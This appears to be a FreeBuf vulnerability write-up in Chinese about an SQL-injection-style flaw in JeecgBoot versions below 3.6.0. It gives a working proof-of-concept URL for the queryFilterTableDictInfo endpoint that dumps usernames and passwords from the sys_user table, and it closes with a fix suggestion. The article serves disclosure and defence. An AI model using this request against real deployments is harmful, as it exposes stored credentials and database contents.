freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

JeecgBoot小于3.6.0版本存在SQL注入漏洞
2024-10-29 12:25:44
所属地 四川省

接口/sys/api/queryFilterTableDictInfo存在SQL注入漏洞

通过审计jeecgboot 3.6.0源代码,发现jeecgboot表接口存在SQL注入漏洞,通过构造表名和字段名,直接获取到数据库中的数据。

漏洞代码:

参数table、text、code可以直接带入到前端url,查询出数据库中任意数据表的数据。

1730175584_6720626041ce2230679dd.png!small?1730175586302

1730175594_6720626a0bb9ccef0654b.png!small?1730175595944

构造漏洞url: http://192.168.10.100/jeecg-boot/sys/api/queryFilterTableDictInfo?table=sys_user&text=username&code=password&filterSql=&pageSize=1000&pageNo=1

漏洞复现:登录后使用用户token,访问http://192.168.10.100/jeecg-boot/sys/api/queryFilterTableDictInfo?table=sys_user&text=username&code=password&filterSql=&pageSize=1000&pageNo=1,获取了数据库中sys_user表所有的用户名和密码,修改table、text和code参数的值可以获取到onenext_init库中所有表的信息,导致数据库敏感信息泄露。

利用前提:获取到token

漏洞接口:/sys/api/queryFilterTableDictInfo

漏洞POC:

?table=sys_user&text=username&code=password&filterSql=&pageSize=1000&pageNo=1

table参数带入mysql表查询,返回的错误信息表onenext_init.mysql不存在,暴露了当前库名为onenext_init,在已知表字段的情况下,能查询onenext_init库中所有表的信息。

1730175622_6720628691fa5fceff2be.png!small

获取了sys_user表中的用户名和密码

1730175637_67206295d6e1ed734299f.png!small?1730175639966

查询tax_task表的数据

1730175650_672062a2937302d7e7671.png!small?1730175652573

整改建议:前端用户可控参数不能直接带入到用户可控参数table中进行查询,或禁用前端用户对/sys/api/queryFilterTableDictInfo接口访问。


# 渗透测试 # web安全 # 漏洞分析
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录